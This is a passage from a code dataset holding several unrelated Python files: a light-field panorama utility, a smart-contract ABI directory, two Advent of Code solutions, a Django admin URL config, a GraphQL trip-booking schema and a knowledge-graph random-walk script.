panorama_im[:, panorama_col: panorama_col + motion, :] = \\\n frames[start_frame + i][:, start_column: start_column + motion, :]\n else:\n print('in else')\n panorama_im[:, panorama_col: panorama_col + motion, :] = \\\n frames[start_frame + i][:, im_shape[1] - motion:, :]\n panorama_col += motion\n return panorama_im\n\n if end_column - start_column < first_motion and end_column != start_column:\n panorama_im[:, : end_column - start_column, :] = frames[start_frame][:, start_column: end_column, :]\n panorama_col += end_column - start_column\n panorama_im[:, panorama_col:, :] = create_panorama_small_start(start_frame, end_frame, start_column,\n start_column, frames, homographies)\n return panorama_im\n\n panorama_im[:, : start_pos[1] - start_pos[0] + first_motion, :] = \\\n frames[start_frame][:, start_pos[0] - first_motion: start_pos[1], :]\n panorama_col += start_pos[1] - start_pos[0] + first_motion\n\n for i in range(1, num_frames):\n # print(i)\n motion = int(round(homographies[0, 2, start_frame + i - 1]))\n if start_pos[i + 1] + motion <= im_shape[1]:\n panorama_im[:, panorama_col: panorama_col + start_pos[i + 1] - start_pos[i] + motion, :] = \\\n frames[start_frame + i][:, start_pos[i]: start_pos[i + 1] + motion, :]\n else:\n panorama_im[:, panorama_col: panorama_col + start_pos[i + 1] - start_pos[i] + motion, :] = \\\n frames[start_frame + i][:, start_pos[i] - motion: start_pos[i + 1], :]\n panorama_col += start_pos[i + 1] - start_pos[i] + motion\n return panorama_im\n\n\ndef create_panorama_big_start(start_frame, end_frame, start_column, end_column, frames, homographies):\n \"\"\"\n Creates a new panorama image in the case where the starting column is bigger than the ending column\n :param start_frame: the first frame to use for the panorama\n :param end_frame: the last frame to use for the panorama\n :param start_column: the first column to use in the panorama\n :param end_column: the last column to use in the panorama\n :param frames: the loaded frames that should be used for creating the panorama\n :param homographies: the homographies between every consecutive frames in the sequence\n :return: the new panorama image\n \"\"\"\n im_shape = frames[0].shape\n if start_frame == end_frame:\n return frames[start_frame][:, end_column: start_column + 1, :]\n total_motion = int(np.sum(np.round(homographies[0, 2, start_frame:end_frame])))\n num_frames = end_frame - start_frame + 1\n num_cols = start_column - end_column + 1\n first_motion = int(round(homographies[0, 2, start_frame]))\n cur_start = start_column - first_motion\n panorama_width = total_motion\n if panorama_width <= 0:\n raise Exception('illegal panorama')\n panorama_im = np.zeros((im_shape[0], panorama_width, im_shape[2])).astype(np.uint8)\n panorama_col = 0\n for i in range(end_frame - start_frame - 1):\n added_motion = (num_cols - first_motion) // (num_frames - 2)\n next_motion = int(round(homographies[0, 2, start_frame + i + 1]))\n if i < ((num_cols - first_motion) % (num_frames - 2)):\n added_motion += 1\n cur_end = cur_start + next_motion - added_motion\n if cur_end < cur_start:\n cur_start, cur_end = cur_end, cur_start\n slit_width = cur_end - cur_start\n if cur_end > start_column:\n cur_end = start_column\n cur_start = cur_end - slit_width\n if cur_start < end_column:\n cur_start = end_column\n cur_end = cur_start + slit_width\n panorama_im[:, panorama_col: panorama_col + slit_width, :] = frames[start_frame + i][:, cur_start:cur_end, :]\n panorama_col += slit_width\n cur_start -= added_motion\n panorama_im = np.delete(panorama_im, np.where((panorama_im == 0).all(0)), axis=1)\n return panorama_im\n\n\ndef create_panorama(start_frame, end_frame, start_column, end_column, frames, homographies):\n \"\"\"\n Creates a new panorama image defined by the given end points\n :param start_frame: the first frame to use for the panorama\n :param end_frame: the last frame to use for the panorama\n :param start_column: the first column to use in the panorama\n :param end_column: the last column to use in the panorama\n :param frames: the loaded frames that should be used for creating the panorama\n :param homographies: the homographies between every consecutive frames in the sequence\n :return: the new panorama image\n \"\"\"\n if start_column <= end_column:\n panorama_im = create_panorama_small_start(start_frame, end_frame, start_column, end_column, frames,\n homographies)\n else:\n panorama_im = create_panorama_big_start(start_frame, end_frame, start_column, end_column, frames, homographies)\n return panorama_im\n\n\ndef produce_panorama_sequence(dir, start_frame, end_frame, start_column, end_column, fix_param=None):\n \"\"\"\n Produces and saves a sequence of panoramas defined by the given parameters.\n :param dir: the directory of the frames that should be used for the panorama\n :param start_frame: the first frame to use for the panorama\n :param end_frame: the last frame to use for the panorama\n :param start_column: the first column to use in the panorama\n :param end_column: the last column to use in the panorama\n :param fix_param: defines which parameter should be fixed - columns or frames. If the given value is 'frames' then\n the produced panoramas will be all possible panoramas with the given frames and columns ranging from the given start\n column to the given end column. If the given value is 'cols' then the produced panoramas will be all possible\n panoramas with the fixed columns and frames ranging from the given start and end frames. If not specified the\n function will create a single panorama image from the defined end points.\n \"\"\"\n sequence = dir.split('/')[-1]\n os.system(f'mkdir ../Results/{sequence}')\n\n # load the frames:\n frames = load_images(dir)\n file_name = dir.split('/')[-1]\n num_frames = len(frames)\n\n # compute all homographies:\n try:\n homographies = np.genfromtxt('../Motion/' + file_name + '.csv', delimiter=',').reshape((3, 3, num_frames - 1))\n except IOError:\n homographies = compute_homographies(frames, translation_only=True)\n csv_data = homographies.reshape((9, num_frames - 1))\n np.savetxt('../Motion/' + sequence + '.csv', csv_data, delimiter=',')\n\n frames = validate_motion_direction(frames)\n\n if fix_param == 'frames':\n min_col = min(start_column, end_column)\n max_col = max(start_column, end_column)\n for j in range(min_col, max_col // 2):\n panorama_im = create_panorama(start_frame, end_frame, j, end_column - j, frames, homographies)\n plt.imsave(f'../Results/{sequence}/panorama_frames{start_frame}-{end_frame}_cols{j}-{end_column - j}.jpg',\n BGR2RGB(panorama_im))\n\n elif fix_param == 'cols':\n num_frames = end_frame - start_frame + 1\n for j in range(num_frames // 2):\n panorama_im = create_panorama(start_frame + j, end_frame - j, start_column, end_column, frames, homographies)\n plt.imsave(f'../Results/{sequence}/panorama_frames{start_frame+j}-{end_frame-j}_cols{start_column}-{end_column}.jpg',\n BGR2RGB(panorama_im))\n\n else:\n panorama_im = create_panorama(start_frame, end_frame, start_column, end_column, frames, homographies)\n plt.imsave(f'../Results/{sequence}/panorama_frames{start_frame}-{end_frame}_cols{start_column}-{end_column}.jpg',\n BGR2RGB(panorama_im))\n\n\ndef validate_motion_direction(frames):\n \"\"\"\n Validates that the given sequence is taken from left to right. If the sequence was taken from right to left,\n this function reverses the frames.\n \"\"\"\n test_num = max(int(len(frames) // 10), 1)\n test_homographies = np.zeros((3, 3, test_num))\n for i in range(test_num):\n test_homographies[:, :, i] = Homography(frames[i], frames[i + 1], translation_only=True)\n if np.sum(test_homographies[0, 2, :]) < 0:\n frames = frames[::-1]\n return frames\n\n\ndef create_left_right_panoramas(dir):\n \"\"\"\n Creates all possible panoramas with the same starting and ending columns. This creates a left to right view.\n \"\"\"\n sequence = dir.split('/')[-1]\n os.system(f'mkdir ../Results/{sequence}')\n\n # load the frames:\n frames = load_images(dir)\n file_name = dir.split('/')[-1]\n num_frames = len(frames)\n\n # compute all homographies:\n try:\n homographies = np.genfromtxt('../Motion/' + file_name + '.csv', delimiter=',').reshape((3, 3, num_frames - 1))\n except IOError:\n homographies = compute_homographies(frames, translation_only=True)\n csv_data = homographies.reshape((9, num_frames - 1))\n np.savetxt('../Motion/' + sequence + '.csv', csv_data, delimiter=',')\n\n frames = validate_motion_direction(frames)\n im_shape = frames[0].shape\n for i in range(im_shape[1]):\n panorama_im = create_panorama(0, num_frames-1, i, i, frames, homographies)\n plt.imsave(f'../Results/{sequence}/panorama_frames{0}-{num_frames-1}_cols{i}-{i}.jpg',\n BGR2RGB(panorama_im))\n\n\n# create_left_right_panoramas('../Data/train-in-snow')\n# produce_panorama_sequence('../Data/apples', 0, 212, 0, 0)\n# frames2video('../Data/train-in-snow-reversed')\n# reverse_video('../Data/Banana')\n# video2frames('Nutella')\n","repo_name":"darkushin/Light-Fields","sub_path":"Code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40148767368","text":"import json\nfrom dataclasses import dataclass\nfrom dataclasses import field\nfrom pathlib import Path\nfrom typing import Any\nfrom typing import Optional\n\nimport requests\nfrom clamfig import deserialize\nfrom clamfig import Serializable\n\nfrom telliot_core.apps.config import ConfigOptions\nfrom telliot_core.utils.home import TELLIOT_CORE_ROOT\n\n\n# Read contract ABIs from json files\n_abi_folder = Path(__file__).resolve().parent / \"data\" / \"abi\"\n\n\n@dataclass\nclass ContractInfo(Serializable):\n name: str\n org: str\n address: dict[int, str]\n abi_file: Optional[str] = None\n\n _abi: Optional[list[Any]] = field(default=None, init=False, repr=False)\n\n def get_abi(self, chain_id: int = 0, api_key: str = \"\") -> list[Any]:\n \"\"\"Returns the contract ABI.\n\n The ABI is lazily loaded from a file the first time it is requested\n and stored for later access. If an abi file is not defined, an attempt\n is made to retrieve the ABI from the chain explorer.\n \"\"\"\n if not chain_id:\n chain_id = list(self.address.keys())[0]\n\n if not self._abi:\n if self.abi_file:\n with open(_abi_folder / self.abi_file, \"r\") as f:\n self._abi = json.load(f)\n else:\n # try to get from etherscan or other explorer using example:\n address = self.address[chain_id]\n if chain_id == 1:\n url = \"https://api.etherscan.io\"\n elif chain_id == 3:\n url = \"https://api-ropsten.etherscan.io\"\n elif chain_id == 4:\n url = \"https://api-rinkeby.etherscan.io\"\n elif chain_id == 5:\n url = \"https://api-goerli.etherscan.io\"\n elif chain_id == 42:\n url = \"https://api-kovan.etherscan.io\"\n elif chain_id == 137:\n url = \"https://api.polygonscan.com\"\n elif chain_id == 420:\n url = \"https://goerli-optimism.etherscan.io/\"\n elif chain_id == 80001:\n url = \"https://api-testnet.polygonscan.com\"\n elif chain_id == 42161:\n url = \"https://api.arbiscan.io/\"\n elif chain_id == 421613:\n url = \"https://goerli.arbiscan.io/\"\n elif chain_id == 10200:\n url = \"https://blockscout.chiadochain.net/\"\n elif chain_id == 100:\n url = \"https://api.gnosisscan.io\"\n elif chain_id == 10:\n url = \"https://optimistic.etherscan.io/\"\n elif chain_id == 3141:\n url = \"https://hyperspace.filfox.info/en\"\n elif chain_id == 314159:\n url = \"https://calibration.filfox.info/en\"\n elif chain_id == 314:\n url = \"https://filfox.info/en\"\n elif chain_id == 11155111:\n url = \"https://api-sepolia.etherscan.io\"\n elif chain_id == 3441005:\n url = \"https://manta-testnet.calderaexplorer.xyz\"\n elif chain_id == 84531:\n url = \"https://api-goerli.basescan.org/\"\n else:\n raise ValueError(f\"Could not retrieve ABI using chain_id {chain_id}\")\n\n url = url + f\"/api?module=contract&action=getabi&address={address}&format=raw\"\n\n if api_key:\n url = url + f\"&apikey={api_key}\"\n\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0\"}\n response = requests.get(url, headers=headers)\n self._abi = response.json()\n\n return self._abi # type: ignore\n\n def restore_state(self, state: dict[Any, Any]) -> None:\n \"\"\"Workaround JSON dict key type issue. This should be handled by clamfig in future.\"\"\"\n strkeys = list(state[\"address\"].keys())\n for chain_id in strkeys:\n state[\"address\"][int(chain_id)] = state[\"address\"].pop(chain_id)\n\n super().restore_state(state)\n\n\n@dataclass\nclass ContractDirectory(ConfigOptions):\n \"\"\"Contract directory object\"\"\"\n\n entries: dict[str, ContractInfo] = field(default_factory=dict)\n\n def add_entry(self, entry: ContractInfo) -> None:\n \"\"\"Add ContractInfo object to directory.\"\"\"\n\n if entry.name in self.entries:\n raise ValueError(f\"Contrct {entry.name} already in directory\")\n\n self.entries[entry.name] = entry\n\n @classmethod\n def from_file(cls, filepath: Path) -> \"ContractDirectory\":\n \"\"\"Create a ContractDirectory from file.\"\"\"\n\n with open(filepath) as f:\n state = json.load(f)\n\n entry_list = deserialize(state)\n\n obj = cls(entries={})\n\n for entry in entry_list:\n obj.add_entry(entry)\n\n return obj\n\n def find(\n self,\n *,\n org: Optional[str] = None,\n name: Optional[str] = None,\n address: Optional[str] = None,\n chain_id: Optional[int] = None,\n ) -> list[ContractInfo]:\n \"\"\"Search the Contract Directory.\"\"\"\n\n result = []\n for info in self.entries.values():\n if org is not None:\n if org != info.org:\n continue\n if chain_id is not None:\n if chain_id not in info.address.keys():\n continue\n if name is not None:\n if name not in info.name:\n continue\n if address is not None:\n if address not in info.address.values():\n continue\n\n result.append(info)\n\n return result\n\n\ncontract_directory = ContractDirectory.from_file(TELLIOT_CORE_ROOT / \"data/contract_directory.json\")\n","repo_name":"tellor-io/telliot-core","sub_path":"src/telliot_core/directory.py","file_name":"directory.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"2539492626","text":"import sys\n\nfrom IntcodeComputer import IntcodeComputer\n\n# =================================================\n\nclass Scaffolding:\n\n def __init__(self, computer_outputs):\n\n # Parse computer output into grid\n self.grid = []\n row = []\n for c in computer.outputs:\n if c == 10 and len(row) > 0:\n self.grid.append(row)\n row = []\n else:\n row.append(chr(c))\n self.nrows = len(self.grid)\n self.ncols = len(self.grid[0])\n\n # Initial robot position and direction\n for i in range(self.nrows):\n for j in range(self.ncols):\n if self.grid[i][j] in ['<', '>', 'v', '^']:\n self.x, self.y = i, j\n self.direc = self.grid[i][j]\n self.grid[i][j] = \"#\"\n break\n\n def get_dxdy(self, direc):\n # Note: x is the row, so the vertical coord,\n # while y is the column, so horizontal coord\n if direc == '^':\n dx = -1; dy = 0\n elif direc == '>':\n dx = 0; dy = +1\n elif direc == 'v':\n dx = +1; dy = 0\n elif direc == '<':\n dx = 0; dy = -1\n return dx, dy\n\n def get_new_direc(self, cur_direc, turn):\n direcs = ['^', '>', 'v', '<']\n idx = direcs.index(cur_direc)\n if turn == \"L\":\n idx -= 1\n elif turn == \"R\":\n idx += 1\n return direcs[idx % 4]\n\n def grid_at(self, x, y):\n if x < 0 or x > self.nrows-1 or y < 0 or y > self.ncols-1:\n return None\n else:\n return self.grid[x][y]\n\n def walk_robot(self, debug=False):\n route = []\n fwd = 0\n while True:\n if debug:\n self.draw()\n if debug:\n print(\"pos={},{} direc={}\".format(self.x, self.y, self.direc))\n dx, dy = self.get_dxdy(self.direc)\n if self.grid_at(self.x+dx, self.y+dy) == \"#\":\n fwd += 1\n self.x += dx; self.y += dy\n if debug:\n print(\"Moved forward\")\n print(\"Fwd:\", fwd)\n else:\n if debug:\n print(\"Can't move forward, trying turn\")\n found = False\n for turn in [\"L\", \"R\"]:\n new_direc = self.get_new_direc(self.direc, turn)\n new_dx, new_dy = self.get_dxdy(new_direc)\n if self.grid_at(self.x+new_dx, self.y+new_dy) == \"#\":\n found = True\n if fwd > 0:\n route.append(fwd)\n if debug:\n print(\"Turned\", turn)\n route.append(turn)\n self.direc = new_direc\n fwd = 0\n break\n if not found:\n if fwd > 0:\n route.append(fwd)\n if debug:\n print(\"Reached end\")\n break\n if debug:\n input(\"ENTER TO CONTINUE\")\n\n return route\n\n def draw(self):\n for i in range(self.nrows):\n _row = self.grid[i][:]\n if i == self.x:\n _row[self.y] = self.direc\n print(\"\".join(_row))\n\n# =================================================\n\nwith open(sys.argv[1]) as f:\n program = [int(x) for x in f.readline().split(\",\")]\n\ncomputer = IntcodeComputer(program)\ncomputer.execute(quiet=True)\nscaff = Scaffolding(computer.outputs)\n\n# Part 1\n\n# Find intersections\ngrid = scaff.grid\ninters = []\nfor i in range(1,scaff.nrows-1):\n for j in range(1,scaff.ncols-1):\n if grid[i][j] == \"#\" and grid[i-1][j] == \"#\" and grid[i+1][j] == \"#\" and grid[i][j-1] == \"#\" and grid[i][j+1] == \"#\":\n inters.append((i,j))\n\nresult = sum([p[0]*p[1] for p in inters])\nprint(\"Part 1:\", result)\n\n# Part 2\n\n# First automatically find route along scaffolding\nroute = scaff.walk_robot()\nroute_str = \",\".join([str(x) for x in route])\nprint(route_str)\n\n# Then manually group instructions, and define them here:\ndefinitions = {\n\"A\": \"L,12,L,8,R,12\",\n\"B\": \"L,10,L,8,L,12,R,12\",\n\"C\": \"R,12,L,8,L,10\"\n}\n\ncomp_route = route_str\nfor func in [\"A\", \"B\", \"C\"]:\n comp_route = comp_route.replace(definitions[func], func)\n\n# Check the compressed route is good\nprint(f\"Compressed: {comp_route} ({len(comp_route)})\", )\nfor func in [\"A\", \"B\", \"C\"]:\n print(f\"Function {func}: {definitions[func]} ({len(definitions[func])})\")\n\n# Now feed the program the definitions (ASCII-translated) and execute it\nprogram[0] = 2\ncomputer = IntcodeComputer(program)\nseq = [ord(x) for x in comp_route] + [10]\nprint(seq)\nfor item in seq:\n computer.inputs.put(item)\nfor func in [\"A\", \"B\", \"C\"]:\n seq = [ord(x) for x in definitions[func]] + [10]\n print(seq)\n for item in seq:\n computer.inputs.put(item)\ncomputer.inputs.put(ord(\"n\"))\ncomputer.inputs.put(10)\ncomputer.execute(quiet=True)\n\n# The last output is the answer\nprint(\"Part 2:\", computer.last_output)\n","repo_name":"meithan/AoC19","sub_path":"day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26532858928","text":"from day3.direction import *\nimport numpy\n\n\nclass SpiralIterator:\n def __init__(self, coords):\n self.coords = coords\n self.sidelen = 1\n self.side_left = 1\n self.direction = r\n\n def turn(self):\n next_dir = self.direction.next\n next_length = self.sidelen\n if next_dir == r or next_dir == l:\n next_length += 1\n self.direction = next_dir\n self.sidelen = next_length\n self.side_left = next_length\n\n def next(self):\n coords = self.coords\n if self.side_left == 0:\n self.turn()\n self.coords += self.direction.vector\n self.side_left -= 1\n return coords\n\n\ndef read_int():\n return int(input())\n\n\ndef next_(current_number, iterator):\n return current_number + 1, iterator.next()\n\n\ndef sum_neighbors(matrix, x, y):\n neighbors = matrix[y - 1][x - 1: x + 2] + matrix[y][x - 1: x + 2] + \\\n matrix[y + 1][x - 1: x + 2]\n print(\"neighbors of %d, %d are %s\" % (x, y, neighbors))\n return sum(\n neighbors\n )\n\n\ndef next__(matrix, x, y):\n next_val = sum_neighbors(matrix, x, y)\n matrix[y][x] = next_val\n return next_val\n\ndestination_number = read_int()\n\nnumber, iterator = 1, SpiralIterator(Vector(6, 6))\niterator.next()\n\n# for i in range(0, destination_number):\n# number, coords = next_(number, iterator)\n#\n# print(\"Distance is %d\" % coords.manhattan_distance())\n\nmatrix = numpy.zeros((13, 13), numpy.dtype('i'))\nmatrix[6, 6] = 1\nwhile number <= destination_number:\n print(matrix)\n coords = iterator.next()\n print(coords)\n number = next__(matrix, coords.x, coords.y)\n\nprint(matrix)\nprint(number)","repo_name":"howsad/aoc2017","sub_path":"src/day3/day3_1.py","file_name":"day3_1.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24025329699","text":"from django.urls import path\nfrom adminapp import views as admin_views\n\napp_name = 'adminapp'\n\nurlpatterns = [\n path('users/create/', admin_views.ShopUserCreateView.as_view(), name='user_create'),\n path('', admin_views.ShopUserListView.as_view(), name='user_list'),\n path('users/update//', admin_views.ShopUserUpdateView.as_view(), name='user_update'),\n path('users/delete//', admin_views.ShopUserDeleteView.as_view(), name='user_delete'),\n\n path('categories/create/', admin_views.ProductCategoryCreateView.as_view(), name='category_create'),\n path('categories/', admin_views.ProductCategoryListView.as_view(), name='category_list'),\n path('categories/update//', admin_views.ProductCategoryUpdateView.as_view(), name='category_update'),\n path('categories/delete//', admin_views.ProductCategoryDeleteView.as_view(), name='category_delete'),\n\n path('products/create//', admin_views.ProductCreateView.as_view(), name='product_create'),\n path('products//', admin_views.ProductListView.as_view(), name='product_list'),\n path('products/update//', admin_views.ProductUpdateView.as_view(), name='product_update'),\n path('products/delete//', admin_views.ProductDeleteView.as_view(), name='product_delete'),\n path('products/detail//', admin_views.ProductDetailView.as_view(), name='product_detail'),\n\n]","repo_name":"AlekseyB86/GB_DJANGO_geekshop","sub_path":"adminapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70143866667","text":"import graphene\nfrom graphene_django import DjangoObjectType\nfrom .models import *\n\n# setting query\n\n\nclass ClientType(DjangoObjectType):\n class Meta:\n model = Client\n fields = '__all__'\n\n\nclass TripType(DjangoObjectType):\n class Meta:\n model = Trip\n fields = '__all__'\n\n\nclass HotelType(DjangoObjectType):\n class Meta:\n model = Hotel\n fields = '__all__'\n\n\nclass Query(graphene.ObjectType):\n client = graphene.Field(ClientType, id=graphene.ID(required=True))\n clients = graphene.List(ClientType)\n\n trip = graphene.Field(TripType, id=graphene.ID(required=True))\n trips = graphene.List(TripType)\n\n hotel = graphene.Field(HotelType, id=graphene.ID(required=True))\n hotels = graphene.List(HotelType)\n\n def resolve_client(root, info, id):\n return Client.objects.get(pk=id)\n\n def resolve_clients(root, info, **kwargs):\n return Client.objects.all()\n\n def resolve_trip(root, info, id):\n return Trip.objects.get(pk=id)\n\n def resolve_trips(root, info, **kwargs):\n return Trip.objects.all()\n\n def resolve_hotel(root, info, id):\n return Hotel.objects.get(pk=id)\n\n def resolve_hotels(root, info, **kwargs):\n return Hotel.objects.all()\n\n# setting mutations\n\n\nclass CreateClient(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n surname = graphene.String(required=True)\n pesel = graphene.String(required=True)\n phoneNumber = graphene.String(required=True)\n\n client = graphene.Field(ClientType)\n\n @classmethod\n def mutate(cls, root, info, name, surname, pesel, phoneNumber):\n client = Client()\n client.name = name\n client.surname = surname\n client.pesel = pesel\n client.phoneNumber = phoneNumber\n client.save()\n return CreateClient(client=client)\n\n\nclass UpdateClient(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n name = graphene.String(required=False)\n surname = graphene.String(required=False)\n pesel = graphene.String(required=False)\n phoneNumber = graphene.String(required=False)\n\n client = graphene.Field(ClientType)\n\n @classmethod\n def mutate(cls, root, info, id, name=None, surname=None, pesel=None, phoneNumber=None):\n client = Client.objects.filter(pk=id)\n if client is None:\n raise Exception('Client does not exist.')\n client = Client.objects.get(pk=id)\n if name:\n client.name = name\n if surname:\n client.surname = surname\n if pesel:\n client.pesel = pesel\n if phoneNumber:\n client.phoneNumber = phoneNumber\n client.save()\n return UpdateClient(client=client)\n\n\nclass DeleteClient(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n\n success = graphene.Boolean()\n\n @classmethod\n def mutate(cls, root, info, id):\n try:\n client = Client.objects.get(pk=id)\n client.delete()\n success = True\n except Client.DoesNotExist:\n success = False\n\n return DeleteClient(success=success)\n\n\nclass CreateHotel(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n phoneNumber = graphene.String(required=True)\n website = graphene.String(required=True)\n stars = graphene.String(required=False, default_value=\"1\")\n\n hotel = graphene.Field(HotelType)\n\n @classmethod\n def mutate(cls, root, info, name, phoneNumber, website, stars):\n hotel = Hotel()\n hotel.name = name\n hotel.phoneNumber = phoneNumber\n hotel.website = website\n hotel.stars = stars\n hotel.save()\n\n return CreateHotel(hotel=hotel)\n\n\nclass UpdateHotel(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n name = graphene.String(required=False)\n phoneNumber = graphene.String(required=False)\n website = graphene.String(required=False)\n stars = graphene.String(required=False)\n\n hotel = graphene.Field(HotelType)\n\n @classmethod\n def mutate(cls, root, info, id, name=None, phoneNumber=None, website=None, stars=None):\n hotel = Hotel.objects.filter(pk=id)\n if hotel is None:\n raise Exception('Hotel does not exist.')\n hotel = Hotel.objects.get(pk=id)\n if name:\n hotel.name = name\n if phoneNumber:\n hotel.phoneNumber = phoneNumber\n if website:\n hotel.website = website\n if stars:\n hotel.stars = stars\n hotel.save()\n return UpdateHotel(hotel=hotel)\n\n\nclass DeleteHotel(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n\n success = graphene.Boolean()\n\n @classmethod\n def mutate(cls, root, info, id):\n try:\n hotel = Hotel.objects.get(pk=id)\n hotel.delete()\n success = True\n except hotel.DoesNotExist:\n success = False\n\n return DeleteHotel(success=success)\n\n\nclass CreateTrip(graphene.Mutation):\n class Arguments:\n client = graphene.List(graphene.ID)\n hotel = graphene.ID()\n country = graphene.String()\n city = graphene.String()\n price = graphene.Decimal()\n checkinDate = graphene.DateTime()\n checkoutDate = graphene.DateTime()\n\n trip = graphene.Field(TripType)\n\n @classmethod\n def mutate(cls, root, info, client, hotel, country, city, price, checkinDate, checkoutDate):\n clients = Client.objects.filter(pk__in=client)\n hotel = Hotel.objects.get(pk=hotel)\n trip = Trip.objects.create(hotel=hotel, country=country, city=city,\n price=price, checkinDate=checkinDate, checkoutDate=checkoutDate)\n trip.client.set(clients)\n trip.save()\n\n return CreateTrip(trip=trip)\n\n\nclass UpdateTrip(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n clients = graphene.List(graphene.ID, required=False)\n hotel = graphene.ID(required=False)\n country = graphene.String(required=False)\n city = graphene.String(required=False)\n price = graphene.Decimal(required=False)\n checkinDate = graphene.DateTime(required=False)\n checkoutDate = graphene.DateTime(required=False)\n\n trip = graphene.Field(TripType)\n\n @classmethod\n def mutate(cls, root, info, id, client=None, hotel=None, country=None, city=None, price=None, checkinDate=None, checkoutDate=None):\n trip = Trip.objects.filter(pk=id)\n if trip is None:\n raise Exception('Trip does not exist.')\n trip = Trip.objects.get(pk=id)\n if client:\n clients = Client.objects.filter(pk__in=client)\n trip.client.set(clients)\n if hotel:\n hotel = Hotel.objects.get(pk=hotel)\n trip.hotel = hotel\n if country:\n trip.country = country\n if city:\n trip.city = city\n if price:\n trip.price = price\n if checkinDate:\n trip.checkinDate = checkinDate\n if checkoutDate:\n trip.checkoutDate = checkoutDate\n trip.save()\n return UpdateTrip(trip=trip)\n\n\nclass DeleteTrip(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n\n success = graphene.Boolean()\n\n @classmethod\n def mutate(cls, root, info, id):\n try:\n trip = Trip.objects.get(pk=id)\n trip.delete()\n success = True\n except trip.DoesNotExist:\n success = False\n\n return DeleteTrip(success=success)\n\n\nclass Mutation(graphene.ObjectType):\n create_client = CreateClient.Field()\n update_client = UpdateClient.Field()\n delete_client = DeleteClient.Field()\n\n create_hotel = CreateHotel.Field()\n update_hotel = UpdateHotel.Field()\n delete_hotel = DeleteHotel.Field()\n\n create_trip = CreateTrip.Field()\n update_trip = UpdateTrip.Field()\n delete_trip = DeleteTrip.Field()\n\n\n# creating schema constructor\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"MadPapa/graphQL-Trips","sub_path":"trips/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":8153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29033490995","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport argparse\nimport gzip, os, csv\nimport numpy as np\nimport random\nimport time\nimport networkx as nx\nimport gensim\nimport shutil\n\nimport findspark\nfindspark.init(\"/usr/local/spark\")\n\nfrom pyspark import SparkConf, SparkContext\n\n\n\ndef addTriple(net, source, target, edge):\n if source in net:\n if target in net[source]:\n net[source][target].add(edge)\n else:\n net[source][target]= set([edge])\n else:\n net[source]={}\n net[source][target] =set([edge])\n \ndef getLinks(net, source):\n if source not in net:\n return {}\n return net[source]\n\ndef randomWalkUniform(triples, startNode, max_depth=5):\n next_node =startNode\n path = 'n'+str(startNode)+'->'\n for i in range(max_depth):\n neighs = getLinks(triples,next_node)\n #print (neighs)\n if len(neighs) == 0: break\n weights = []\n queue = []\n for neigh in neighs:\n for edge in neighs[neigh]:\n queue.append((edge,neigh))\n weights.append(1.0)\n edge, next_node = random.choice(queue)\n path = path+ 'e'+str(edge)+'->'\n path = path+ 'n'+str(next_node)+'->'\n\n return path\n\n\n\ndef preprocess(folders, filename):\n entity2id = {}\n relation2id = {}\n triples = {}\n\n ent_counter = 0\n rel_counter = 0\n for dirname in folders:\n for fname in os.listdir(dirname):\n if not filename in fname: continue\n print (fname)\n if fname.endswith('.gz'):\n gzfile= gzip.open(os.path.join(dirname, fname), mode='rt')\n else:\n gzfile =open(os.path.join(dirname, fname))\n\n for line in csv.reader(gzfile, delimiter=' ', quotechar='\"'):\n #print (line)\n h = line[0]\n r = line[1]\n t = line[2]\n\n #if not t.startswith('<'): continue\n\n if h in entity2id:\n hid = entity2id[h]\n else:\n entity2id[h] = ent_counter\n ent_counter+=1\n hid = entity2id[h]\n\n if t in entity2id:\n tid = entity2id[t]\n else:\n entity2id[t] = ent_counter\n ent_counter+=1\n tid = entity2id[t]\n\n if r in relation2id:\n rid = relation2id[r]\n else:\n relation2id[r] = rel_counter\n rel_counter+=1\n rid = relation2id[r]\n addTriple(triples, hid, tid, rid)\n print ('Relation:',rel_counter, ' Entity:',ent_counter)\n return entity2id,relation2id,triples\n\n\ndef preprocess(file_path):\n entity2id = {}\n relation2id = {}\n triples = {}\n\n ent_counter = 0\n rel_counter = 0\n \n print (file_path)\n if file_path.endswith('.gz'):\n file= gzip.open(file_path, mode='rt')\n else:\n file =open(file_path)\n\n for line in csv.reader(file, delimiter='\\t', quotechar='\"'):\n #print (line)\n h = line[0]\n r = line[1]\n t = line[2]\n\n #if not t.startswith('<'): continue\n\n if h in entity2id:\n hid = entity2id[h]\n else:\n entity2id[h] = ent_counter\n ent_counter+=1\n hid = entity2id[h]\n\n if t in entity2id:\n tid = entity2id[t]\n else:\n entity2id[t] = ent_counter\n ent_counter+=1\n tid = entity2id[t]\n\n if r in relation2id:\n rid = relation2id[r]\n else:\n relation2id[r] = rel_counter\n rel_counter+=1\n rid = relation2id[r]\n addTriple(triples, hid, tid, rid)\n print ('Relation:',rel_counter, ' Entity:',ent_counter)\n return entity2id,relation2id,triples\n\n\ndef randomNWalkUniform(triples, n, walks, path_depth):\n path=[]\n for k in range(walks):\n walk = randomWalkUniform(triples, n, path_depth)\n 